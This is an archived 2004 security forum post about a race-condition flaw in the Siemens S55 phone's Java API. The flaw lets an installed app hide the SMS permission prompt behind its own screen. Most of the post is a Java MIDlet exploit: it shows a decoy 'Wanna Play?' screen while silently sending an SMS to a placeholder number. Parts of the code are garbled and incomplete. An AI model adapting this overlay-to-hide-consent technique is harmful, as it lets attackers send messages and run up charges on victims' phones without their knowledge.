Siemens S55 Unauthorized Sms Sending Vulnerability

Full Version: Siemens S55 Unauthorized Sms Sending Vulnerability

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Apr 28 2004, 05:32 PM

QUOTE

The Siemens S55 is a cell phone and provides a Java virtual machine including a full-featured API for additional software development by third parties. A vulnerability in the phone allows attackers that are able to make a user install their software (Java based), to cause the phone to send out SMSes without the need for user interaction.

Vulnerable Systems:
* Siemens S55

The Java API provides the possibility to send out SMS messages through the Java Applications. This interface will ask for permissions to send out the SMS by presenting a message screen.

The API also provides objects that allow a programmer to create personal screen layouts for his applications

The vulnerability found could be described as a race condition that allows the programmer to overlay the message that asks for permission by his own screen craft.

The result of that vulnerability will allow any program to send SMS to any number without notification to the user.

Exploit:
package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;

public class hello extends MIDlet implements CommandListener
{
static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
Display display;
static hellohello;

public void startApp (){
HelloCanva kanvas = new HelloCanva();
Scr2 scr2 = new Scr2();
display = Display.getDisplay(this);
// Menu
Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
scr2.addCommand(exitCommand);
scr2.setCommandListener(this);
//Data

// screen 1
display.setCurrent(kanvas);
mycall();
// screen 2
display.setCurrent(scr2);
//destroyApp(false);
}

public void mycall(){

String SMSstr= "Test";

try {
/* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
SMS.send("0170-Numder", SMSstr);
}
/* Exception handling */
catch (com.siemens.mp.NotAllowedException ex) {
// Some handling code ...
}
catch (IOException ex) {
//Some handling code ...
}
catch (IllegalArgumentException ex) {
// Some handling code ...
}
} //public viod call()

protected void destroyApp (boolean

{
display.setCurrent(null);
this.notifyDestroyed(); // notify KVM
}

protected void pauseApp ()
{ }

public void commandAction (Command c, Displayable d){
destroyApp(false);
}

}

class HelloCanva extends Canvas
{
public void paint (Graphics g)
{
String str = new String("Wanna Play?");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
}
}
class Scr2 extends Canvas
{
public void paint (Graphics g) {
String str = new String("cool");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
}
}

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.